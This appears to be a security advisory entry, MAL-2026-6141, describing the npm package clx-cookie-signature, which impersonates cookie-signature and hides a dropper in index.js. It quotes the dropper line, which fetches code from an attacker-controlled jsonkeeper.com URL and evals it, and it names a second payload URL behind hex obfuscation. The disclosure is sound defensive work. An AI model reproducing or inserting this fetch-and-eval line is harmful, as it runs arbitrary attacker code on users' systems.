MAL-2026-6141

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3) Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk <tj@learnboost.com>', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues `require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); })`, eval'ing whatever JSON the author currently hosts at that URL. A helper `g()` (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.